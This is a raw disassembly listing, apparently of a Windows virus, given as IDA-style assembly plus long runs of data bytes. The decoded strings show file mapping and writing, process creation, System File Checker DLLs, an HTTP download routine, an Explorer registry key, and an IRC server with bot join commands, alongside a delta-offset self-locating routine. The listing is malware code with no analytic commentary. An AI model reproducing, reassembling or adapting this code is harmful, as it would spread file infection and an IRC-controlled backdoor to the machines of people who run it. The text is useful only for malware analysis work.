db 65h ; e
db 61h ; a
db 74h ; t
db 65h ; e
db 46h ; F
db 69h ; i
db 6Ch ; l
db 65h ; e
db 4Dh ; M
db 61h ; a
db 70h ; p
db 70h ; p
db 69h ; i
db 6Eh ; n
db 67h ; g
db 41h ; A
db 0
db 43h ; C
db 72h ; r
db 65h ; e
db 61h ; a
db 74h ; t
db 65h ; e
db 50h ; P
db 72h ; r
db 6Fh ; o
db 63h ; c
db 65h ; e
db 73h ; s
db 73h ; s
db 41h ; A
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_315135AF
loc_31513639: ; CODE XREF: sub_315135AF+1F�j
; sub_315135AF+21�j
add [ebx+72h], al
db 65h
popa
jz short near ptr loc_315136A3+2
loc_31513640: ; CODE XREF: sub_315135AF+2A�j
push edx
db 65h
insd
outsd
jz short loc_315136AB
push esp
push 64616572h
add [ebx+72h], al
db 65h
popa
jz short near ptr loc_315136B6+2
push esp
push 64616572h
add [ebx+72h], al
db 65h
popa
jz short near ptr loc_315136C2+3
push esp
outsd
outsd
insb
push 33706C65h
xor dl, [ebx+6Eh]
popa
jo short near ptr loc_315136E1+1
push 4500746Fh
js short loc_315136DF
jz short near ptr loc_315136CB+1
push 64616572h
add [esi+69h], al
insb
db 65h
push esp
imul ebp, [ebp+65h], 79536F54h
jnb short loc_31513700
db 65h
insd
push esp
imul ebp, [ebp+65h], 65724600h
db 65h
dec esp
imul esp, [edx+72h], 797261h
inc edi
db 65h
jz short near ptr loc_315136E3+6
loc_315136A3: ; CODE XREF: sub_315135AF+8F�j
imul ebp, [ebp+41h], 69727474h
loc_315136AB: ; CODE XREF: sub_315135AF+95�j
bound esi, [ebp+74h]
db 65h
jnb short loc_315136F2
add [edi+65h], al
jz short near ptr loc_315136FB+1
loc_315136B6: ; CODE XREF: sub_315135AF+A2�j
imul ebp, [ebp+53h], 657A69h
inc edi
db 65h
jz short loc_31513708
loc_315136C2: ; CODE XREF: sub_315135AF+AF�j
imul ebp, [ebp+54h], 656D69h
inc edi
loc_315136CB: ; CODE XREF: sub_315135AF+C7�j
db 65h
jz short near ptr loc_3151371A+1
outsd
db 64h
jnz short near ptr loc_31513739+5
db 65h
dec eax
popa
outsb
db 64h
insb
db 65h
inc ecx
add [edi+65h], al
jz short near ptr loc_3151372D+6
loc_315136DF: ; CODE XREF: sub_315135AF+C5�j
db 65h
insd
loc_315136E1: ; CODE XREF: sub_315135AF+BE�j
jo short near ptr loc_31513727+2
loc_315136E3: ; CODE XREF: sub_315135AF+F1�j
imul ebp, [ebp+4Eh], 41656D61h
add [edi+65h], al
jz short near ptr loc_31513741+3
db 65h
insd
loc_315136F2: ; CODE XREF: sub_315135AF+FF�j
jo short near ptr loc_31513741+3
popa
jz short near ptr loc_3151375E+1
inc ecx
add [edi+65h], al
loc_315136FB: ; CODE XREF: sub_315135AF+105�j
jz short loc_31513753
db 65h
jb short near ptr loc_31513772+1
loc_31513700: ; CODE XREF: sub_315135AF+DB�j
imul ebp, [edi+6Eh], 74654700h
push esi
loc_31513708: ; CODE XREF: sub_315135AF+110�j
db 65h
jb short near ptr loc_3151377C+2
imul ebp, [edi+6Eh], 417845h
inc edi
db 65h
jz short near ptr loc_3151376B+1
outsd
insb
jnz short near ptr loc_31513781+6
loc_3151371A: ; CODE XREF: sub_315135AF:loc_315136CB�j
db 65h
dec ecx
outsb
outsw
jb short near ptr loc_3151378C+2
popa
jz short near ptr loc_3151378C+1
outsd
outsb
inc ecx
loc_31513727: ; CODE XREF: sub_315135AF:loc_315136E1�j
add [edi+ebp*2+61h], cl
db 64h
dec esp
loc_3151372D: ; CODE XREF: sub_315135AF+12E�j
imul esp, [edx+72h], 41797261h
add [ebp+61h], cl
jo short loc_3151378F
loc_31513739: ; CODE XREF: sub_315135AF+120�j
imul esp, [ebp+77h], 6946664Fh
insb
loc_31513741: ; CODE XREF: sub_315135AF+13F�j
; sub_315135AF:loc_315136F2�j
add gs:[edi+70h], cl
outs dx, byte ptr gs:[esi]
inc esi
imul ebp, [ebp+4Dh], 69707061h
outsb
db 67h
inc ecx
loc_31513753: ; CODE XREF: sub_315135AF:loc_315136FB�j
add [edi+70h], cl
outs dx, byte ptr gs:[esi]
push eax
jb short near ptr loc_315137C9+1
arpl [ebp+73h], sp
loc_3151375E: ; CODE XREF: sub_315135AF+146�j
jnb short $+2
push eax
jb short loc_315137D2
arpl [ebp+73h], sp
jnb short near ptr loc_31513794+7
xor al, [esi+69h]
loc_3151376B: ; CODE XREF: sub_315135AF+164�j
jb short near ptr loc_315137DA+6
jz short $+2
push eax
jb short near ptr loc_315137DA+7
loc_31513772: ; CODE XREF: sub_315135AF+14E�j
arpl [ebp+73h], sp
jnb short near ptr loc_315137A9+1
xor cl, [esi+65h]
js short near ptr loc_315137EC+4
loc_3151377C: ; CODE XREF: sub_315135AF:loc_31513708�j
add [ebx+65h], dl
jz short near ptr loc_315137C5+2
loc_31513781: ; CODE XREF: sub_315135AF+169�j
imul ebp, [ebp+41h], 69727474h
bound esi, [ebp+74h]
loc_3151378C: ; CODE XREF: sub_315135AF+173�j
; sub_315135AF+170�j
db 65h
jnb short loc_315137D0
loc_3151378F: ; CODE XREF: sub_315135AF+188�j
add [ebx+65h], dl
jz short loc_315137DA
loc_31513794: ; CODE XREF: sub_315135AF+1B7�j
imul ebp, [ebp+54h], 656D69h
push ebx
insb
db 65h, 65h
jo short $+4
push ebx
jns short loc_31513818
jz short loc_3151380C
insd
push esp
loc_315137A9: ; CODE XREF: sub_315135AF+1C6�j
imul ebp, [ebp+65h], 69466F54h
insb
db 65h
push esp
imul ebp, [ebp+65h], 6D6E5500h
popa
jo short loc_31513813
imul esp, [ebp+77h], 6946664Fh
insb
loc_315137C5: ; CODE XREF: sub_315135AF+1D0�j
add gs:[esi+69h], dl
loc_315137C9: ; CODE XREF: sub_315135AF+1AA�j
jb short near ptr loc_3151383E+1
jnz short loc_3151382E
insb
inc ecx
insb
loc_315137D0: ; CODE XREF: sub_315135AF:loc_3151378C�j
insb
outsd
loc_315137D2: ; CODE XREF: sub_315135AF+1B2�j
arpl [eax], ax
push edi
jb short loc_31513840
jz short loc_3151383E
inc esi
loc_315137DA: ; CODE XREF: sub_315135AF+1E3�j
; sub_315135AF:loc_3151376B�j ...
imul ebp, [ebp+0], 6441744Eh
push 75h
jnb short loc_3151385A
push eax
jb short near ptr loc_3151384F+3
jbe short near ptr loc_3151384F+5
insb
loc_315137EC: ; CODE XREF: sub_315135AF+1CB�j
db 65h, 67h, 65h
jnb near ptr 3845h
outsd
imul esp, [ebp+6Eh], 0
dec esi
jz short near ptr loc_3151383B+1
jb short near ptr loc_3151385F+1
popa
jz short loc_31513863
inc esi
imul ebp, [ebp+0], 7243744Eh
db 65h
popa
jz short loc_31513870
push eax
loc_3151380C: ; CODE XREF: sub_315135AF+1F6�j
jb short loc_3151387D
arpl [ebp+73h], sp
jnb short $+2
loc_31513813: ; CODE XREF: sub_315135AF+20C�j
dec esi
jz short near ptr loc_31513856+3
jb short loc_3151387D
loc_31513818: ; CODE XREF: sub_315135AF+1F4�j
popa
jz short loc_31513880
push eax
jb short loc_3151388D
arpl [ebp+73h], sp
jnb short near ptr loc_31513863+5
js short $+2
dec esi
jz short loc_3151386B
jb short loc_3151388F
popa
jz short near ptr loc_3151388F+3
push ebx
loc_3151382E: ; CODE XREF: sub_315135AF+21C�j
arpl gs:[ecx+ebp*2+6Fh], si
outsb
add [esi+74h], cl
inc ebx
jb short near ptr loc_3151389E+1
popa
loc_3151383B: ; CODE XREF: sub_315135AF+248�j
jz short loc_315138A2
push ebp
loc_3151383E: ; CODE XREF: sub_315135AF+228�j
; sub_315135AF:loc_315137C9�j
jnb short near ptr loc_315138A4+1
loc_31513840: ; CODE XREF: sub_315135AF+226�j
jb short near ptr loc_3151388F+3
jb short loc_315138B3
arpl [ebp+73h], sp
jnb short $+2
dec esi
jz short loc_31513899
popa
jo short near ptr loc_315138A4+1
loc_3151384F: ; CODE XREF: sub_315135AF+238�j
; sub_315135AF+23A�j
imul esp, [ebp+77h], 6553664Fh
loc_31513856: ; CODE XREF: sub_315135AF+265�j
arpl [ecx+ebp*2+6Fh], si
loc_3151385A: ; CODE XREF: sub_315135AF+235�j
outsb
add [esi+74h], cl
dec edi
loc_3151385F: ; CODE XREF: sub_315135AF+24A�j
jo short loc_315138C6
outsb
inc esi
loc_31513863: ; CODE XREF: sub_315135AF+24D�j
; sub_315135AF+272�j
imul ebp, [ebp+0], 704F744Eh
loc_3151386B: ; CODE XREF: sub_315135AF+277�j
outs dx, byte ptr gs:[esi]
push eax
jb short loc_315138DF
loc_31513870: ; CODE XREF: sub_315135AF+25A�j
arpl [ebp+73h], sp
jnb short loc_315138C9
outsd
imul esp, [ebp+6Eh], 0
dec esi
jz short near ptr loc_315138CB+1
loc_3151387D: ; CODE XREF: sub_315135AF:loc_3151380C�j
; sub_315135AF+267�j
jo short near ptr loc_315138E3+1
outsb
loc_31513880: ; CODE XREF: sub_315135AF+26A�j
push ebx
arpl gs:[ecx+ebp*2+6Fh], si
outsb
add [esi+74h], cl
push eax
jb short near ptr loc_315138FB+1
loc_3151388D: ; CODE XREF: sub_315135AF+26D�j
jz short near ptr loc_315138F3+1
loc_3151388F: ; CODE XREF: sub_315135AF+279�j
; sub_315135AF+27C�j ...
arpl [esi+edx*2+69h], si
jb short loc_31513909
jnz short near ptr loc_315138F7+1
insb
dec ebp
loc_31513899: ; CODE XREF: sub_315135AF+29B�j
db 65h
insd
outsd
jb short near ptr loc_31513914+3
loc_3151389E: ; CODE XREF: sub_315135AF+289�j
add [esi+74h], cl
push ecx
loc_315138A2: ; CODE XREF: sub_315135AF:loc_3151383B�j
jnz short loc_31513909
loc_315138A4: ; CODE XREF: sub_315135AF:loc_3151383E�j
; sub_315135AF+29E�j
jb short near ptr loc_3151391E+1
dec ecx
outsb
outsw
jb short near ptr loc_31513918+1
popa
jz short loc_31513918
outsd
outsb
push esp
outsd
loc_315138B3: ; CODE XREF: sub_315135AF+293�j
imul esp, [ebp+6Eh], 0
dec esi
jz short near ptr loc_3151390F+2
jb short loc_31513925
jz short near ptr loc_31513922+1
push esi
imul esi, [edx+74h], 4D6C6175h
loc_315138C6: ; CODE XREF: sub_315135AF:loc_3151385F�j
db 65h
insd
outsd
loc_315138C9: ; CODE XREF: sub_315135AF+2C4�j
jb short loc_31513944
loc_315138CB: ; CODE XREF: sub_315135AF+2CC�j
add [edx+74h], dl
insb
push ebp
outsb
imul esp, [ebx+6Fh], 74536564h
jb short near ptr loc_31513941+2
outsb
db 67h
push esp
outsd
inc ecx
loc_315138DF: ; CODE XREF: sub_315135AF+2BF�j
outsb
jnb short near ptr loc_3151394A+1
push ebx
loc_315138E3: ; CODE XREF: sub_315135AF:loc_3151387D�j
jz short loc_31513957
imul ebp, [esi+67h], 41535700h
push ebx
jz short loc_31513950
jb short loc_31513965
jnz short near ptr loc_31513962+1
loc_315138F3: ; CODE XREF: sub_315135AF:loc_3151388D�j
add [ebx+6Ch], ah
outsd
loc_315138F7: ; CODE XREF: sub_315135AF+2E6�j
jnb short loc_3151395E
jnb short near ptr loc_31513969+1
loc_315138FB: ; CODE XREF: sub_315135AF+2DC�j
arpl [ebx+65h], bp
jz short $+2
arpl [edi+6Eh], bp
outsb
arpl gs:[eax+eax+67h], si
loc_31513909: ; CODE XREF: sub_315135AF+2E4�j
; sub_315135AF:loc_315138A2�j
db 65h
jz short near ptr loc_31513973+1
outsd
jnb short near ptr loc_31513981+2
loc_3151390F: ; CODE XREF: sub_315135AF+309�j
bound edi, [ecx+6Eh]
popa
insd
loc_31513914: ; CODE XREF: sub_315135AF+2ED�j
add gs:[edx+65h], dh
loc_31513918: ; CODE XREF: sub_315135AF+2FE�j
; sub_315135AF+2FB�j
arpl [esi+0], si
jnb short near ptr loc_31513981+1
outsb
loc_3151391E: ; CODE XREF: sub_315135AF:loc_315138A4�j
add fs:[ebx+6Fh], dh
loc_31513922: ; CODE XREF: sub_315135AF+30D�j
arpl [ebx+65h], bp
loc_31513925: ; CODE XREF: sub_315135AF+30B�j
jz short $+2
dec ecx
outsb
jz short loc_31513990
jb short loc_3151399B
db 65h
jz short loc_31513973
insb
outsd
jnb short near ptr loc_31513998+1
dec eax
popa
outsb
db 64h
insb
add gs:[ecx+6Eh], cl
jz short loc_315139A4
jb short near ptr loc_315139AE+1
loc_31513941: ; CODE XREF: sub_315135AF+329�j
db 65h
jz short loc_3151398B
loc_31513944: ; CODE XREF: sub_315135AF:loc_315138C9�j
db 65h
jz short loc_3151398A
outsd
outsb
outsb
loc_3151394A: ; CODE XREF: sub_315135AF+331�j
arpl gs:[ebp+64h], si
push ebx
loc_31513950: ; CODE XREF: sub_315135AF+33E�j
jz short near ptr loc_315139B2+1
jz short loc_315139B9
add [ecx+6Eh], cl
loc_31513957: ; CODE XREF: sub_315135AF:loc_315138E3�j
jz short near ptr loc_315139BC+2
jb short loc_315139C9
db 65h
jz short near ptr loc_315139AB+2
loc_3151395E: ; CODE XREF: sub_315135AF:loc_315138F7�j
jo short loc_315139C5
outsb
inc ecx
loc_31513962: ; CODE XREF: sub_315135AF+342�j
add [ecx+6Eh], cl
loc_31513965: ; CODE XREF: sub_315135AF+340�j
jz short near ptr loc_315139CB+1
jb short loc_315139D7
loc_31513969: ; CODE XREF: sub_315135AF+34A�j
db 65h
jz short near ptr loc_315139BA+1
jo short loc_315139D3
outsb
push ebp
jb short near ptr loc_315139DC+2
inc ecx
loc_31513973: ; CODE XREF: sub_315135AF+37E�j
; sub_315135AF:loc_31513909�j
add [ecx+6Eh], cl
jz short near ptr loc_315139DC+1
jb short loc_315139E8
db 65h
jz short near ptr loc_315139CE+1
db 65h
popa
db 64h
inc esi
loc_31513981: ; CODE XREF: sub_315135AF+36C�j
; sub_315135AF+35E�j
imul ebp, [ebp+0], 41564441h
push eax
loc_3151398A: ; CODE XREF: sub_315135AF:loc_31513944�j
dec ecx
loc_3151398B: ; CODE XREF: sub_315135AF:loc_31513941�j
xor esi, [edx]
db 2Eh
inc esp
dec esp
loc_31513990: ; CODE XREF: sub_315135AF+37A�j
dec esp
add [edx+65h], dl
db 67h
inc ebx
insb
outsd
loc_31513998: ; CODE XREF: sub_315135AF+383�j
jnb short near ptr loc_315139FD+2
dec ebx
loc_3151399B: ; CODE XREF: sub_315135AF+37C�j
db 65h
jns short $+3
push edx
db 65h, 67h
dec edi
jo short loc_31513A09
loc_315139A4: ; CODE XREF: sub_315135AF+38E�j
outsb
dec ebx
db 65h
jns short near ptr loc_315139EC+2
js short loc_315139EC
loc_315139AB: ; CODE XREF: sub_315135AF+3AC�j
add [edx+65h], dl
loc_315139AE: ; CODE XREF: sub_315135AF+390�j
db 67h
push ecx
jnz short loc_31513A17
loc_315139B2: ; CODE XREF: sub_315135AF:loc_31513950�j
jb short near ptr loc_31513A2C+1
push esi
popa
insb
jnz short near ptr loc_31513A1D+1
loc_315139B9: ; CODE XREF: sub_315135AF+3A3�j
inc ebp
loc_315139BA: ; CODE XREF: sub_315135AF:loc_31513969�j
js short loc_315139FD
loc_315139BC: ; CODE XREF: sub_315135AF:loc_31513957�j
add [edx+65h], dl
db 67h
push ebx
db 65h
jz short loc_31513A1A
popa
loc_315139C5: ; CODE XREF: sub_315135AF:loc_3151395E�j
insb
jnz short near ptr loc_31513A2C+1
inc ebp
loc_315139C9: ; CODE XREF: sub_315135AF+3AA�j
js short loc_31513A0C
loc_315139CB: ; CODE XREF: sub_315135AF:loc_31513965�j
add [esi+33h], dl
loc_315139CE: ; CODE XREF: sub_315135AF+3CB�j
imul byte ptr [edx+2]
push esi
push esi
loc_315139D3: ; CODE XREF: sub_315135AF+3BD�j
mov edx, esp
push 1
loc_315139D7: ; CODE XREF: sub_315135AF+3B8�j
push edx
push dword ptr [edx+18h]
push esi
loc_315139DC: ; CODE XREF: sub_315135AF+3C7�j
; sub_315135AF+3C1�j
call dword ptr [ebp+10428Ch]
mov eax, esp
push esi
push esi
push esi
push eax
loc_315139E8: ; CODE XREF: sub_315135AF+3C9�j
push esi
push dword ptr [eax+18h]
loc_315139EC: ; CODE XREF: sub_315135AF+3FA�j
; sub_315135AF+3F7�j
call dword ptr [ebp+103EFAh]
add esp, 10h
pop esi
retn 8
; END OF FUNCTION CHUNK FOR sub_315135AF
; ---------------------------------------------------------------------------
db 8Dh ;
db 49h ; I
db 0FBh ;
db 2Bh ; +
; ---------------------------------------------------------------------------
loc_315139FD: ; CODE XREF: sub_315135AF:loc_315139BA�j
; sub_315135AF:loc_31513998�j
enter 6851h, 0
; ---------------------------------------------------------------------------
db 0
db 0
db 0E8h ;
db 8Dh ;
db 4Ch ; L
db 24h ; $
db 3
db 6Ah ; j
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_315135AF
loc_31513A09: ; CODE XREF: sub_315135AF+3F3�j
add [edx+5], ch
loc_31513A0C: ; CODE XREF: sub_315135AF:loc_315139C9�j
push ecx
push eax
push ebx
push 5
mov ecx, esp
push eax
mov edx, esp
push eax
loc_31513A17: ; CODE XREF: sub_315135AF+401�j
push esp
push 40h
loc_31513A1A: ; CODE XREF: sub_315135AF+412�j
push ecx
push edx
push ebx
loc_31513A1D: ; CODE XREF: sub_315135AF+408�j
call dword ptr [ebp+103F22h]
add esp, 0Ch
call dword ptr [ebp+103F2Ah]
loc_31513A2C: ; CODE XREF: sub_315135AF:loc_315139B2�j
; sub_315135AF+417�j
add esp, 8
retn
; END OF FUNCTION CHUNK FOR sub_315135AF
; ---------------------------------------------------------------------------
db 8Dh ;
db 95h ;
db 30h ; 0
db 3Eh ; >
db 10h
db 0
db 33h ; 3
db 0C9h ;
db 6Ah ; j
db 0
db 52h ; R
db 68h ; h
db 30h ; 0
db 0
db 32h ; 2
db 0
db 8Bh ;
db 0C4h ;
db 51h ; Q
db 51h ; Q
db 6Ah ; j
db 40h ; @
db 50h ; P
db 51h ; Q
db 6Ah ; j
db 18h
db 83h ;
db 0C0h ;
db 8
db 54h ; T
db 6Ah ; j
db 0Eh
db 50h ; P
db 0FFh
db 95h ;
db 1Eh
db 3Fh ; ?
db 10h
db 0
db 83h ;
db 0C4h ;
db 20h
db 33h ; 3
db 0D2h ;
db 85h ;
db 0C0h ;
db 0Fh
db 99h ;
db 0C2h ;
db 0F7h ;
db 0DAh ;
db 58h ; X
db 23h ; #
db 0C2h ;
db 0C3h ;
db 57h ; W
db 33h ; 3
db 0FFh
db 0E8h ;
db 0C1h ;
db 0FFh
db 0FFh
db 0FFh
db 0Fh
db 84h ;
db 0A5h ;
db 0
db 0
db 0
db 50h ; P
db 68h ; h
db 28h ; (
db 73h ; s
db 0
db 0
db 8Bh ;
db 0D4h ;
db 6Ah ; j
db 0
db 8Bh ;
db 0CCh ;
db 6Ah ; j
db 40h ; @
db 68h ; h
db 0
db 0
db 10h
db 0
db 6Ah ; j
db 2
db 52h ; R
db 6Ah ; j
db 0
db 68h ; h
db 28h ; (
db 73h ; s
db 0
db 0
db 6Ah ; j
db 0
db 51h ; Q
db 53h ; S
db 50h ; P
db 0FFh
db 95h ;
db 12h
db 3Fh ; ?
db 10h
db 0
db 5Fh ; _
db 59h ; Y
db 0FFh
db 95h ;
db 62h ; b
db 3Eh ; >
db 10h
db 0
db 85h ;
db 0FFh
db 74h ; t
db 71h ; q
db 8Bh ;
db 8Dh ;
db 90h ;
db 15h
db 10h
db 0
db 0E3h ;
db 0Ch
db 8Dh ;
db 95h ;
db 0
db 10h
db 10h
db 0
db 3
db 0D1h ;
db 57h ; W
db 53h ; S
db 0FFh
db 0D2h ;
db 8Bh ;
db 85h ;
db 0FEh ;
db 3Eh ; >
db 10h
db 0
db 8Dh ;
db 8Fh ;
db 16h
db 29h ; )
db 0
db 0
db 0E8h ;
db 2Bh ; +
db 0FFh
db 0FFh
db 0FFh
db 8Bh ;
db 85h ;
db 16h
db 3Fh ; ?
db 10h
db 0
db 8Dh ;
db 8Fh ;
db 63h ; c
db 29h ; )
db 0
db 0
db 0E8h ;
db 1Ah
db 0FFh
db 0FFh
db 0FFh
db 8Bh ;
db 85h ;
db 2
db 3Fh ; ?
db 10h
db 0
db 8Dh ;
db 8Fh ;
db 6Ah ; j
db 29h ; )
db 0
db 0
db 0E8h ;
db 9
db 0FFh
db 0FFh
db 0FFh
db 8Bh ;
db 85h ;
db 6
db 3Fh ; ?
db 10h
db 0
db 85h ;
db 0C0h ;
db 74h ; t
db 20h
db 8Dh ;
db 8Fh ;
db 77h ; w
db 29h ; )
db 0
db 0
db 0E8h ;
db 0F4h ;
db 0FEh ;
db 0FFh
db 0FFh
db 8Bh ;
db 85h ;
db 0Eh
db 3Fh ; ?
db 10h
db 0
db 85h ;
db 0C0h ;
db 74h ; t
db 0Bh
db 8Dh ;
db 8Fh ;
db 84h ;
db 29h ; )
db 0
db 0
db 0E8h ;
db 0DFh ;
db 0FEh ;
db 0FFh
db 0FFh
db 8Bh ;
db 0C7h ;
db 5Fh ; _
db 0C3h ;
db 55h ; U
db 0E8h ;
db 0
db 0
db 0
db 0
; ---------------------------------------------------------------------------
pop ebp
sub ebp, 101B24h
xor ecx, ecx
lea eax, [ebp+101EAFh]
push ecx
push esp
push ecx
push ecx
push eax
push ecx
push ecx
call dword ptr [ebp+103E8Eh]
xchg eax, [esp]
call dword ptr [ebp+103E62h]
pop ebp
retn 4
; ---------------------------------------------------------------------------
db 55h, 0E8h, 0
dd 5D000000h, 1B53ED81h, 0FF6A0010h, 1B1E958Dh, 52500010h
dd 2420CDh, 0C483002Ah, 85C7660Ch, 101B64h, 85C720CDh
dd 101B66h, 2A0024h, 1A6AC35Dh, 9E858h, 428D0000h, 0C9FEAA61h
dd 69C3F075h, 103F7C95h, 8840500h, 95894208h, 103F7Ch
dd 55C3E2F7h, 0E8h, 0ED815D00h, 101BADh, 3F809D8Bh, 7C830010h
dd 0F000824h, 0B984h, 8EC8100h, 54000002h, 10468h, 0B695FF00h
dd 8B00103Eh, 24848DFCh, 104h, 0E8006A50h, 4, 525256h
dd 0B295FF57h, 3300103Eh, 4978DC9h, 51000001h, 51026A51h
dd 68016Ah, 52400000h, 3E7E95FFh, 85960010h, 505B74F6h
dd 1046854h, 0FF570000h, 22024B4h, 95FF0000h, 103F5Eh
dd 74C08559h, 5014E316h, 6AD48Bh, 56575152h, 3EF695FFh
dd 85590010h, 56D075C0h, 3E6295FFh, 578D0010h, 6A575244h
dd 978D5844h, 104h, 6AC033ABh, 0ABF35910h, 50505050h, 52505050h
dd 3E8695FFh, 0C4810010h, 208h, 82474FFh, 3F4E95FFh, 0FF530010h
dd 103F4E95h, 4C25D00h, 0A3E8000h, 8B460175h, 10158C8Dh
dd 8D19E300h, 10100095h, 56D10300h, 0C084D2FFh, 11F880Fh
dd 840F0000h, 110h, 753A3E80h, 3E804610h, 1840F00h, 80000001h
dd 0F175203Eh, 503E8146h, 75474E49h, 0C6CF8B42h, 2B4F0146h
dd 6A51CEh, 0FF535651h, 103F4695h, 0C13B5900h, 0DF850Fh
dd 858D0000h, 101EA3h, 0C68006Ah, 50000000h, 4695FF53h
dd 3D00103Fh, 0Ch, 0BF850Fh, 0B1E90000h, 81000000h, 4952503Eh
dd 0A5850F56h, 83000000h, 3CAC08C6h, 99840F0Dh, 3C000000h
dd 0ACF37520h, 850F3A3Ch, 8Ch, 20200DADh, 213D2020h, 75746567h
dd 203CAC7Fh, 7E817C75h, 746820FFh, 81717574h, 3A70037Eh
dd 68752F2Fh, 0FF47C6h, 10BA310Fh, 0F7000027h, 95FF52E2h
dd 103EE6h, 5050C033h, 9E85050h, 44000000h, 6C6E776Fh
dd 64616Fh, 3F5695FFh, 0C0850010h, 0C9333674h, 3F808589h
dd 68510010h, 80000200h, 50565151h, 3F5A95FFh, 958D0010h
dd 101BA7h, 54C93350h, 51525051h, 8E95FF51h, 8700103Eh
dd 95FF2404h, 103E62h, 8D80C3F8h, 10157Fh, 6AC3F901h, 0FF016A01h
dd 473FF33h, 0C08515FFh, 0DB335A74h, 0BB3D08Bh, 8D3C5003h
dd 101DCBB5h, 0CBA8B00h, 8B000001h, 1088Ah, 2BF80300h
dd 0CB8B60CBh, 7461A6F3h, 0F5E24705h, 0C7832EEBh, 0CC8B530Fh
dd 50D48B57h, 51406A54h, 0FFFF6A52h, 103F2295h, 968D8B00h
dd 8300103Eh, 0CF2B0CC4h, 0C707E983h, 0E8006A07h, 34F8900h
dd 464F53C3h, 52415754h, 694D5C45h, 736F7263h, 5C74666Fh
dd 646E6957h, 5C73776Fh, 72727543h, 56746E65h, 69737265h
dd 455C6E6Fh, 6F6C7078h, 726572h, 67726154h, 6F487465h
dd 2007473h, 500000h, 70000000h, 69786F72h, 72692E6Dh
dd 6C616763h, 2E797861h, 4E006C70h, 204B4349h, 6C766864h
dd 61767566h, 4553550Ah, 4A6B2052h, 204E494Fh, 72697626h
dd 550A7574h, 0E8h, 0ED815D00h, 101EB5h, 157F85C6h, 0FF000010h
dd 103EBA95h, 1FE8C100h, 1E6A3C74h, 3E72B58Bh, 0AC590010h
dd 2A752E3Ch, 0FF3E8166h, 8D23751Dh, 103F76BDh, 2768B00h
dd 0A566A557h, 38EC858Dh, 858F0010h, 103912h, 0FA4689FAh
dd 0FBFE4E8Ch, 0CFE201B1h, 21E850EBh, 83FFFFFBh, 408247Ch
dd 8E84475h, 53000000h, 442E4346h, 0FF004C4Ch, 103EC695h
dd 74C00B00h, 26A930Dh, 6E95FF53h, 0FF00103Eh, 97E893D0h
dd 0E8FFFFFEh, 0Bh, 5F434653h, 442E534Fh, 0FF004C4Ch, 103EC695h
dd 0FE7CE800h, 0E8FFFFh, 0FFFFFFF6h, 1012D48Dh, 8DC93300h
dd 10432485h, 51515100h, 51515051h, 0C295FF51h, 0E800103Eh
dd 0Bh, 52455355h, 442E3233h, 0FF004C4Ch, 103EC695h, 0AE800h
dd 73770000h, 6E697270h, 416674h, 6E95FF50h, 8900103Eh
dd 103E7685h, 8D310F00h, 1019858Dh, 7C858900h, 5100103Fh
dd 3EC695FFh, 68930010h, 4, 1992B58Dh, 8D590010h, 103F62BDh
dd 0F5C2E800h, 0C766FFFFh, 101E7585h, 83500000h, 101E77A5h
dd 958D0000h, 101E35h, 16A5450h, 6852006Ah, 80000002h
dd 3F6695FFh, 0C0850010h, 8D22755Ah, 101E688Dh, 66A5200h
dd 1E75B58Dh, 56540010h, 52515050h, 3F6A95FFh, 0FF580010h
dd 103F6295h, 8385C600h, 1041h, 0CE8h, 4F535700h, 32334B43h
dd 4C4C442Eh, 0C695FF00h, 9300103Eh, 768h, 0E9B58D00h
dd 59001018h, 3F32BD8Dh, 3DE80010h, 0E8FFFFF5h, 0Ch, 494E4957h
dd 2E54454Eh, 4C4C44h, 3EC695FFh, 0C0850010h, 235840Fh
dd 68930000h, 5, 1927B58Dh, 8D590010h, 103F4EBDh, 0F506E800h
dd 0BD83FFFFh, 103F52h, 10840F00h, 81000002h, 190ECh, 1685400h
dd 0FF000001h, 103F3295h, 90C48100h, 50000001h, 6AD48Bh
dd 5295FF52h, 8500103Fh, 0D7559C0h, 138868h, 0E695FF00h
dd 0EB00103Eh, 77BD83E2h, 101Eh, 858D2975h, 101E7Bh, 3E95FF50h
dd 8500103Fh, 89840FC0h, 8B000001h, 8B0C40h, 858F30FFh
dd 101E77h, 418385C6h, 6A010010h, 6A016A00h, 4A95FF02h
dd 8300103Fh, 840FFFF8h, 160h, 73958D93h, 6A00101Eh, 0FF535210h
dd 103F3A95h, 0FC08500h, 14085h, 94BD8D00h, 0B100101Eh
dd 0FA3CE808h, 9468FFFFh, 5E000000h, 3489E62Bh, 95FF5424h
dd 103EBEh, 1EA2BD8Dh, 1B10010h, 0FFFA1DE8h, 8F958DFFh
dd 6A00101Eh, 146800h, 53520000h, 3F4695FFh, 448D0010h
dd 958D1424h, 104324h, 0AB60F50h, 1424448Bh, 208E0C1h
dd 4A12014Ah, 34A1202h, 824440Bh, 0C10FE180h, 0B5108E0h
dd 0FF102444h, 0BD8D5032h, 103F84h, 1CE8h, 362E2500h, 202E2078h
dd 253A202Eh, 382E2525h, 20782578h, 4A0A7325h, 204E494Fh
dd 95FF5700h, 103E76h, 0ACC481h, 6A0000h, 0FF535750h, 103F4695h
dd 988D8B00h, 6A001015h, 6B1BE300h, 0E8510DC9h, 5, 0A642526h
dd 95FF5700h, 103E76h, 500CC483h, 7680BEBh, 8D000000h
dd 101EA8BDh, 0FF535700h, 103F4695h, 7EC08500h, 84B58D54h
dd 8300103Fh, 101598A5h, 8D8D0000h, 104183h, 6ACE2Bh, 0FF535651h
dd 103F4295h, 0F88300h, 8B912F7Eh, 84B58DFEh, 0B000103Fh
dd 75AEF20Dh, 2AE86010h, 61FFFFFAh, 9E31772h, 0EB01778Dh
dd 2BCF8BEAh, 84BD8DCEh, 0F300103Fh, 0EBF787A4h, 95FF53B9h
dd 103F36h, 157FBD80h, 74010010h, 7530682Ah, 95FF0000h
dd 103EE6h, 4183BD80h, 74000010h, 7785C711h, 101Eh, 0C6000000h
dd 10418385h, 8E90000h, 0C7FFFFFEh, 10158885h, 0
dd 4C25D80h, 4F0A0D00h, 6F6F6E20h, 666F206Eh, 66696C20h
dd 4F202165h, 6D697420h, 6F742065h, 6C656320h, 61726265h
dd 0D216574h, 2020200Ah, 204F2020h, 6D6D7573h, 67207265h
dd 65647261h, 0A0D216Eh, 656C6552h, 656C746Eh, 796C7373h
dd 70616820h, 61207970h, 6520646Eh, 63657078h, 746E6174h
dd 7473202Ch, 69646E61h, 203A676Eh, 570A0D2Dh, 68637461h
dd 20676E69h, 206C6C61h, 20796164h, 20646E61h, 6867696Eh
